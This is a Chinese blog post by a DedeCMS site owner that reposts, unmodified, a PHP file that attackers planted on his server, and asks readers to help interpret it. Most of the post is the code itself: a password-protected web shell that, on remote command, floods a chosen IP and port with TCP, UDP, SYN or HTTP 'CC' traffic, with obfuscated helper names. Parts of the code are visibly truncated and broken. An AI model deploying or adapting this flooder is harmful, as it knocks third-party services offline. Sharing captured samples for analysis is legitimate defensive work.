维护dede(织梦)系统的站长会常常看到一些陌生的文件,这些文件都是被攻击后,黑客上传的代码。
文件的代码我就不改动了,以下是最原始的代码。
<?php
$password="xxjh123";
$ip = gethostbyname($_SERVER["SERVER_NAME"]);
$ddos_version="6.6+";
//POWER-BY 这样代码原来黑客推广的网站,去现在暂时改成本站的网站。
//最新修改 BY QQ:11206923
//血腥DDOS-6.6+版本支持TCP,UDP,CC等功能
$key_file="key.txt";
if(!is_file_exists($key_file)){
write_file($key_file,"",true);
}
$include_key_file = include $key_file;
if(!isset($_GET["act"])){
exit_and_print('www.liqingbo.cn');
}
if($_GET["act"]=="die"){
if(!is_function_exists("fsockopen")){exit_and_print("error:SHELL服务器缺少必要函数支持.");}
if(!is_function_exists("set_time_limit") or !is_function_exists("ignore_user_abort")){
exit_and_print("error:SHELL服务器无法启动自动攻击.");}
if(@strip($_GET["pass"])<>strip($password)){exit_and_print("error:SHELL密码错误,无法攻击.");}
write_file($key_file,"",true);
exit_and_print("died");
}
if($_GET["act"]=="view"){
if(!is_function_exists("fsockopen")){exit_and_print("error:SHELL服务器缺少必要函数支持.");}
if(!is_function_exists("set_time_limit") or !is_function_exists("ignore_user_abort")){exit_and_print("error:SHELL服务器无法启动自动攻击.");}
if(@strip($_GET["pass"])<>strip($password)){exit_and_print("error:SHELL密码错误,无法攻击.");}
exit_and_print("ok:".$ddos_version."|".$ip."|".$include_key_file);
}
if($_GET["act"]=="attack"){
ignore_user_abort (true);
set_time_limit(0);
$process_times = 0;
if(!isset($_GET["ip"]) or !isset($_GET["port"]) or !isset($_GET["exec_time"]) or !isset($_GET["att_size"])){exit_and_print("error:参数提交错误");}
if(@strip($_GET["pass"])<>strip($password)){exit_and_print("error:SHELL密码错误,无法攻击.");}
write_file($key_file,"",true);
$ip = gethostbyname($_GET["ip"]);
$rand = strip($_GET["port"]);
$exec_time = strip($_GET["exec_time"]);
$att_size= strip($_GET["att_size"]);
@$att_type= strip($_GET["att_type"]);
@$att_web= strip($_GET["att_web"]);
@$att_blqs= strip($_GET["att_blqs"]);
@$att_bljs= strip($_GET["att_bljs"]);
$time = time();
$max_time = $time+$exec_time;
$out="";
for($i=0;$i $max_time){write_file($key_file,"",true);break;}
if($att_type!=="tcp"){
if($att_type=="udp"){#UDP
$fp = fsockopen("udp://$ip", $rand, $errno, $errstr, 5);
if($fp){fwrite($fp, $out);}
}
else if($att_type=="cc"){#CC
$fp = fsockopen(oOoOOoOOoo00O0OOO0O($att_web), o0ooo0($att_web), $errno, $errstr, 5);
$Aanvraag = "GET ".o0o0o0o0o0o0o0O0O0o0O0O0o0($att_web,$att_blqs,$att_bljs)." HTTP/1.1\r\n";
$Aanvraag .= "Referer: http://".oOoOOoOOoo00O0OOO0O($att_web)."/?".$out." \r\n";
$Aanvraag .= "Accept: */*\r\n";
$Aanvraag .= "Accept-Language: zh-CN, zh, *\r\n";
$Aanvraag .= "Accept-Encoding: gzip, deflate\r\n";
$Aanvraag .= "User-Agent: Mozilla/4.0 (compatible;MSIE 6.0;Windows NT 5.1)\r\n";
$Aanvraag .= "Host: ".oOoOOoOOoo00O0OOO0O($att_web).":".o0ooo0($att_web)."\r\n";
$Aanvraag .= "Connection: Keep-Alive\r\n\r\n";
fwrite($fp, $Aanvraag);
}else{#syn
/*
if($process_times == 1){
$fp = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
@socket_set_nonblock($fp);
$_ = explode('|', $att_size);
$nums = intval($_[0])?intval($_[0]):20;
$sleep = intval($_[1])?intval($_[1]):100;
}
for ($j = 0; $j < $nums; $j++)@socket_connect($fp, $ip, $rand);
usleep($sleep);
*/
for ($j = 0; $j < 20; $j++)$fp = fsockopen("tcp://$ip", $rand, $errno, $errstr,0);
}
}else{#TCP
$fp = fsockopen("$ip", $rand, $errno, $errstr, 5);
if($fp){fputs($fp, $out);}
}
fclose($fp);
}elseif($include_key_file=="die"){ die("I am dying!");}
}#END WHILE
@exit_and_print("over");
}
function write_file($file,$contents,$flag=false){ $file=dirname(__FILE__)."/".$file;
if ($flag==false){file_put_contents($file,$contents,FILE_APPEND);
}else{
file_put_contents($file,$contents);
}}function is_function_exists($a){return function_exists($a);
}function strip($a){return trim($a);
}function is_file_exists($a){return file_exists($a);
}function exit_and_print($a){return exit("".$a);
}function make_ddos_str($i){$o0o0o0O0O0O00O00o00o0oO0O0o = "abcdefghijklmnopqrstuvwxyz!@#$%^&*()_+QWERTYUIOP{}ASDFGHJKL:ZXCVBNM<>?/";
$oo0o0O0o00oOo0O0o0OoOOoO0OoOoO = "";
for($o0o0o0ooooooo=0;
$o0o0o0ooooooo以上有许多的地方去也不明白是什么意思。
也欢迎了解的人一起研究或者指点。